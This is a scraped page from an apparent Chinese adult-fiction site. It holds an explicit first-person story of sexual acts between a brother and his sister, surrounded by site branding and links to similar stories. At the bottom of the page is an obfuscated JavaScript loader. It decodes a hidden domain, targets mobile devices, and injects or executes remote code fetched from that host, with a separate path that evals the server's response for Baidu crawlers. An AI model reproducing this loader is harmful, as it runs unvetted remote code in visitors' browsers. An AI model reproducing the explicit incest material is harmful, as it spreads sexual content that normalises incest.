返回

姐姐系列之午间小歇789

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

上回说到我姐姐早上叫起床,历经千辛万苦终于把我叫起来了。起床之后我和姐姐洗了个澡就出门了买饭去了。

待我关好门之后,我就牵着姐姐下楼了,走到单元口,我和我姐同时看了对方一眼。松开了握住对方的手。

因为我家和我姐姐家都在一所大学里,所以在大学里有很多既认识我又认识我姐的人。所以,为了不引起不必要的麻烦,我和我姐约定好了,在有人的时候就不要做出过于亲密的举动了。

我和我姐并肩走着,边走边讨论今天中午买什么吃。

不一会就走到了我姐姐家楼下了,因为之前我姐姐的内裤全被打湿了,我就要她脱下来别穿了,免得穿着难受,可我姐又觉得不穿内裤外面直接穿条牛仔短裤不舒服,就要我陪她回家换条内裤。

进了姐姐的家门后,姐姐慌忙火急的跑进了自己的房间,在里面呆了好久才出来。

我姐一出来我就用戏虐的口吻问她:“怎么样,现在感觉舒服了?”我姐当即白了我一眼:“你还好意思说呢,还不都是因为你。”

我心里想道:什么叫因为我啊,我睡觉睡得好好的,你再按折腾,最后自己湿了,难道这也怪我么?

我心里想是那么想,但是没有说出来。走上前扶住姐姐的下巴直接吻了上去。“你要是再怪我,我就这么咬你~ !知道错了么?”

我姐直接被我这突然一下搞愣住了。半天才回过神来,敲了一下我的头,一脸娇羞:“讨厌!”我们就这样打闹着下楼了。

走出了校门仍旧不知道吃什么好,就在学校的小吃街闲逛,因为当时是暑假嘛,天很热。在街上走得有点受不了了。我姐看到前面有家快餐店,就连忙拽着我跑了进去。

已经快餐店,整个人都舒服起来了,冷气开得那叫一个足。姐姐丢下我,直接奔向窗口:“你去占位置,我去买东西。”

我找了一个两个人对着坐的位置坐下来,一边享受空调的凉爽,一边等待着姐姐回来。

不一会,我姐就端着两碗盖浇饭和两杯饮料回来了。

我连忙接过盖浇饭,两个人就这么边吃边聊起来。

“姐,等下我们吃了饭干嘛?”

“还能干嘛啊,回家躲着呗,这么热的天,我可不想到处跑,冬天好不容易才攒白了,出去玩又晒黑了。”

“其实你不晒也没多白的说,我们家就没几个天生长得白的。”说着还用手在她腿上摸了两下。

我姐连忙打掉我的手,“你个小流氓,你往哪摸呢。”

我连忙做了个噤声的手势,“小声点,你这么嚷嚷别人都往这边看呢,要是人家以为我耍流氓揍我怎么办?”

“好啦,我不说就是了,谁叫你手不规矩的。等下陪我去趟我家,我把我的笔记本拿过来。然后去你家拍你打游戏去。”

“嗯!”

之后,我们又闲扯了一会。吃完饭,去姐姐家里和她一起拿了电脑,就回到我家。

回到家后,我连忙帮姐姐把电脑接好放在床上。

这里的夏天太热了,这么一折腾,弄得我一身的汗,我连忙边脱自己衣服边往厕所走去。

“姐,我先去洗个澡,你先玩会电脑。”

“哦,去吧去吧,你洗完了我再洗。”

我洗完澡之后穿上内裤,拿着长裤想了一下,就把它连同上衣一起拿出来了,并没有穿在身上。

以前姐姐来我家找我的时候,那时候也是夏天,所以我在家只穿了一条三角裤,我姐姐一看到我就说我流氓,然后把我推进房里穿衣服。不过现在,我想应该不用了。嘿嘿。

我回到我的房间,看见我姐在那专心的上网,我偷偷摸摸的走到我姐背后,从后面一把握住姐姐的胸。

结果我接下的哇哇乱叫,一回头看是我,又没好气的敲了一下我的头。

“你吓死我了,你洗完了啊,好快啊,该我去洗了,毛巾我用你的了啊。”

我告诉姐姐,我的毛巾的颜色后,姐姐起身往厕所走,这时看见我只穿一条内裤,正准备骂我流氓的。突然一想,那是多此一举,于是把张开的嘴巴闭上了,什么也没说就走出去了。

姐姐出去了之后我就开始打游戏,因为打游戏打得太专注,没注意到姐姐已经出来了。

姐姐走到我身后,直接趴在了我的背上,背后传来一阵阵沐浴乳的香味,湿湿的头发将轻轻地搭在我的身上,这时我才知道我姐已经洗完了。

“我亲爱的好弟弟,别一个人玩嘛,找个我们两个人都可以玩的游戏,我们一起玩。”

我想起高中的时候,我姐曾和我说,她们班上微机课时,老师出去了,全班玩CS的事。我果断把我电脑里尘封已久的CS给我姐装上。

我们玩1V1,刚开始的几局,都是我赢了,到后来就出现大逆转了,不管我走到哪,我姐都知道。不管阴在哪,我姐都发现我,然后隔着箱子或者们把我干掉了。

我回头一看就知道原因呢,我坐在电脑桌前玩,我姐坐在我的床上玩。我回头看的时候刚好看到我姐一边玩一边盯着我的屏幕。

怪不得我老输的,原来是这么回事。我立马丢下鼠标爬上床往我姐身上出去。

我姐见我上了床,连忙把笔记本放到一边。

我上床后直接压在姐姐身上,伸手去捏姐姐的脸。

姐姐见我要捏自己的脸连忙伸出手乱拍,想要打开我的手。

我见捏脸不行,就马上转攻别的地方,突然双手压在姐姐的胸部。

姐姐被我的突然袭击弄的一愣,然后又连忙想要推掉我的手,可是我姐姐一个女孩子,力气哪有我大,试了很多次都没有成功。

我见姐姐没办法推开我的手,就握住姐姐的双乳,轻轻地揉。

姐姐仍旧想反抗,可是试了多次开始没成功,便也开始一边享受我的按摩,一边转向进攻其他地方。

我姐想起我怕痒,就伸手在我的腰上和腋下挠痒。

我被我姐姐挠的浑身无力,手自然也松开了。

我姐就借这个机会翻身把我骑在了身下,手仍然没有停下。

我不住的对姐姐求饶:“够了,够了……哈哈哈……别再……哈哈……别再挠了,我受……哈……受不了了,放手啊……哈哈哈哈哈……”

我姐仍旧没有住手。“叫你欺负我!叫你调戏我!叫你非礼我!你个小流氓,你知道错了么?嗯?”

“我知……哈哈……知道错……哈哈……知道错了,我再……哈哈哈……再也不敢了,松手啊!”

虽然我已经求饶了,可我姐还是没有停下攻势。

我在慌乱中摸到了姐姐的腰上,顺势抓住姐姐衣服的下沿往上一拉,姐姐的衣服被我掀上去了,纯白色的胸罩露了出来。

我趁姐姐还没反应过来,又把姐姐的胸罩向下一拉,就这样,姐姐雪白的胸部就这样暴露在了空气中。

姐姐似乎已经疯的起劲了,自己的乳房完全暴露在我的眼前都一点不在意,只是一个劲的继续在我的身上挠痒痒。

看来不给点厉害瞧瞧,我姐是不会停下来的,伸手握住姐姐的乳房不断地揉捏。

姐姐见我的手已经在她的胸部乱摸了,便挠痒挠得更起劲了,嘴里还叫道:“你个小色狼,色胆不小啊!不仅脱你姐姐的衣服,还摸你姐姐我的胸部。看我今天不好好收拾你~ !”

这时我痒得受不了了,身体不受控制的乱动。

我的手在姐姐的胸部胡乱的捏着,这时我的食指和中指刚好夹住了姐姐的乳头,由于姐姐的痒痒攻势,我已经完全没办法控制手上的力道了,夹着姐姐乳头的力道原来越重。

只听到姐姐一声娇嗔,整个人直接扑到了我的身上。后来我才知道,姐姐的乳头特别的敏感。

姐姐倒下来之后,正好压着我的手,我觉得手压着难受就把手抽了出来。这时我手上唯一反败为胜的筹码也没有了。

姐姐虽然扑倒在我的身上了,可她的手还是没有停下来。我没办法还手,只好贴着姐姐的胸部侧边乱抓。

只听见姐姐一声尖叫,手停下来了,我姐坐了起来。

我做起来后看到姐姐在自己的胸部上摸,这是我才知道,我刚才一不小心抓伤了姐姐的胸部,便连忙凑上去。

“姐,没事吧?疼不疼?没破皮吧?”

“你说疼不疼啊,要不你被抓一下试试。看!都抓出红印子了。”姐姐说着便拿开了摸胸部的手。

我一看,果然有几条很浅的血印子。便伸手去摸姐姐胸口上的血印子,为了让我看得更清楚,我把头也凑到姐姐胸部跟前了。

这时我才想起,这是我第一次在这么近的距离看姐姐的胸部。姐姐坚挺的胸部,淡红色的乳头都是第一次那么近的距离观看。

雪白的胸部,算不上丰满,但是很挺,没有一丝下垂。姐姐的乳头已经在刚刚我手的刺激下变大变硬了。

看了一会就有一种很强烈的想要把我姐的胸部含在嘴里的冲动。

我姐姐因为刚才的疯闹,现在身上没有什么力气了,两只手搭在我的肩上,就这样看着我盯着自己的胸部。

“看什么呢?小色狼弟弟。”

“姐,你的胸部好好看。”说着便一口含住姐姐的胸部。

我姐见我突然含住了她的乳房,先是一惊,然后慢慢地闭上了眼睛,原本放在我肩膀上的手也移到我的头上抚摸我的头。(其实我挺喜欢被这样摸头的,主要还是看谁在摸。)

我亲吻着姐姐的胸部,一会又变成有舌头舔。左胸亲一会,右胸舔一会,直到亲和舔的够本了才停下来。

停止了亲吻姐姐的胸部,一口含住姐姐的乳头,用力的允吸着姐姐的乳头。

这时姐姐原本摸我的头的手已经停下来了。

我见姐姐已经开始轻轻的喘气,我知道姐姐开始有感觉的,便用舌头在姐姐的乳头上逗弄。

先是用舌头在乳头上轻轻地拨弄,然后又用嘴唇含住姐姐的乳头用舌头在乳尖划过来划过去。

姐姐现在已经由喘气变成了轻微的呻吟。

我再次将姐姐的乳头连同乳晕含住,舌头围着乳头沿着乳晕转动。顺时针转了一下又改成逆时针转。

这时的姐姐已经完全无力的趴在我的身上享受着我的按摩。

我停止了舌头的挑逗,尝试着让牙齿轻轻地触碰姐姐的乳头,再碰到姐姐的乳头之后,轻轻地一咬。

“别咬,好痛!”虽然姐姐嘴上叫着好痛,声音却没有一点痛苦的感觉,脸上也看不出痛苦的表情。

我现在已经忍受不住了,小弟弟完全顶起了内裤,龟头从内裤的上沿露了出来。我抱起了姐姐放在床上,在姐姐的配合下脱掉了姐姐的上衣和胸罩。

我拿起姐姐的衣服丢到了一边,然后抓住姐姐的手放在我的小弟弟上。

姐姐的手放在我的小弟弟上之后,便隔着内裤轻轻抚摸。

我对姐姐说道:“姐,你看我的小弟弟因为你的原因变得这么大了,内裤压得我好难受,快帮我脱掉。”说着便站了起来。

我姐姐紧跟着跪在了我的面前,双手扶住内裤两边打算一点点的把内裤脱下来,但是发现因为我的小弟弟勃起了,所以如果不把内裤的前面翻下来是没有办法脱掉的。没办法,我姐只好凑上前把内裤的前面翻下来。

就在放下来的那一刹那,我的小弟弟弹了出来,挺立在我姐姐的面前。我的小弟弟里姐姐的脸只有几厘米,似乎连早上做爱留下来的淫靡的味道都可以闻到。

姐姐就这样在这么近的距离盯着的肉棒。然后左手扶着我的大腿,右手握住我的肉棒。当姐姐的手适应了我的肉棒之后,便开始笨拙的上下套弄。

姐姐的爱抚让我不自觉的让我的小弟弟离姐姐的脸越来越近。就在龟头离姐姐的脸还有两厘米的时候,姐姐的头靠过来,轻轻地在我的龟头上亲了一下。

这时的我已经按耐不住心中的浴火,将姐姐一把推倒在床上。用双手夹住姐姐的双腿,解开姐姐的牛仔短裤的拉链,慢慢的将姐姐的短裤脱了下来。

姐姐穿着一条纯白色的内裤,看样子和胸罩是一套。原来,姐姐回去换换内裤的时候,连同胸罩一起换了。

我二话不说,一把将姐姐的内裤扯了下来。姐姐的阴道口已经微微的湿润了,少量的爱液沾在阴毛上,显现出性感的光泽。

我趴下来,从姐姐的小腿开始亲吻,一点点的往上亲吻,亲吻到大腿时,已经由亲吻变成了用舌头直接舔。

当姐姐的两条大腿都沾满了我的口水后,我的舌头已经游走到了姐姐的阴部。

“弟低,别,好痒。”

我先从姐姐的腹部开始亲,边亲边往下移,当触到姐姐的阴毛后,便由亲变舔,当舔到姐姐的小穴时,姐姐的阴道口已经由最开始的只有阴毛上沾到一点爱液变成爱液泛滥,由阴道口流向屁股,也有的直接滴落到床单上。

我用舌头沿着姐姐的大阴唇不住的在的私密部位游走,这时姐姐的腿直接盘在了我的背上,紧紧地盘在了我的背上。

我的舌头灵活的翻开姐姐的大阴唇,在大阴唇和小阴唇之间轻轻地按摩着。

姐姐在强烈的刺激下,直接把我的头紧紧地按在自己的阴部,爱液如同洪水般从小穴中流出,身体不住的抽搐,喉咙不断地深呼吸。姐姐高潮了……!

过了好一会,姐姐才稍稍平息下来,手和脚也松开了。

姐姐已经高潮了,可是我还没有爽到了,我的嘴巴放过了姐姐的小穴,继续往上入侵。游过小腹,越过胸部,然后沿着锁骨、脖子,最终到达姐姐的脸上。

我将舌头再次送入姐姐的口中,连同我的唾液和姐姐的爱液一同送入姐姐的口中。

舌头继续在姐姐口中和另一条舌头纠缠,我已经忍受不住了,想要立刻就在姐姐的身上发泄我的欲火。

我推起姐姐的双腿,正当我要用我早已无比粗硬的阴经贯穿姐姐的小穴时,准确的说是当我的龟头已经插入姐姐的小穴时,姐姐原本因无力而摊开的双手抵住我的小腹,不让我的肉棒插进去。

我疑惑的看着姐姐,姐姐缓缓地说道:“别,别插进来,你早上已经做过一次了,别做太频繁了,对身体不好的。而且,我现在没什么力气了你要是再来,我会受不了的。”

我想想也对,姐姐才刚刚被我夺取处女不久,这么频繁的亲热肯定会受不了的。而且我早上刚射过一次,现在又来的话说不定真的对身体不好。想是这么想,嘴里还是不爽的说道:“啊~ !姐,你怎么能这样,你是爽够了,可我还没爽到呢!”

“好啦~ !好啦~ !现在先陪姐姐睡一会,姐姐真的好累身上一点劲都没有。等晚上有精神了,让姐姐我好好地服侍你,满足你的一切要求好么?”

“恩~ !好吧~ !”便抱住姐姐找了个舒服的姿势闭上眼睛,然后牵着姐姐的手握住我仍然又粗又长的肉棒睡去。从那时起,我发现我很喜欢睡觉的时候有一只细腻温柔的手握住我的小弟弟~ !

对不住了各位,原本是打算一次写完的,后来才发现写起来其实内容挺多的,于是就觉得把中午和晚上分开来写。

请原谅我,写这一篇花了我三天时间,前两天是从十点到十二点,今天是从八点半到现在。

写作果真是个苦差事,唉~ !

大家看完之后请用心回复,我也会对于每一条回复进行回复的,因为我觉得看着这有交流才更有意思,各位看官,对吧~ !

评分
相关推荐
3.0分

3.0分 【姐姐系列之过年】667

3.0分

3.0分 【姐姐系列之返校】43c

3.0分

3.0分 姐姐系列之浪漫之夜ed3

3.0分

3.0分 空姐系列之小攀日记6c8

3.0分

3.0分 午后小歇a99

3.0分

3.0分 【姐姐系列之浪漫之夜】【完】a53

3.0分

3.0分 姐姐系列之姐,让我再睡一会吧75b

3.0分

3.0分 小野猫N系列 催眠姐姐2dd

3.0分

3.0分 【姐姐系列之侄女来袭(第一天)】f4c

3.0分

3.0分 变身系列之空姐契约e1b


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};